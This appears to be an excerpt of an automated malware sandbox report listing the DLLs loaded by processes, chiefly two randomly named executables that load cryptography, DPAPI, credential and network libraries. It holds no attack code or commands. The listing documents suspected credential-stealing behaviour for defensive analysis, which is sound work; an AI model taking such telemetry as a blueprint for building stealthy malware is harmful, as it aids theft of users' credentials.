Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cdprt.dll	Jump to behavior
Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\RuntimeBroker.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Windows\System32\RuntimeBroker.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: userenv.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: secur32.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: wininet.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: netapi32.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: netutils.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: samcli.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: ntmarta.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: wbemcomn.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: amsi.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: userenv.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: cryptdlg.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: msoert2.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: msimg32.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: cryptui.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: msasn1.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: msftedit.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: propsys.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: secur32.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: wininet.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: netapi32.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: netutils.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: samcli.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: ntmarta.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: secur32.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: wininet.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: netapi32.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: netutils.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: samcli.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: ntmarta.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: secur32.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: wininet.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: netapi32.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: netutils.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: samcli.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: ntmarta.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: secur32.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: wininet.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: netapi32.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: netutils.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: samcli.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: ntmarta.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: secur32.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: wininet.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: netapi32.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: netutils.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: samcli.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: ntmarta.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: secur32.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: wininet.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: netapi32.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: netutils.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: samcli.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: ntmarta.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: secur32.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: wininet.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: netapi32.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: netutils.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: samcli.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: ntmarta.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: secur32.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: wininet.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: netapi32.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: netutils.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: samcli.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: ntmarta.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: secur32.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: wininet.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: netapi32.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: netutils.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: samcli.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: ntmarta.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: secur32.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: wininet.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: netapi32.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: netutils.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: samcli.dll
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Section loaded: version.dll
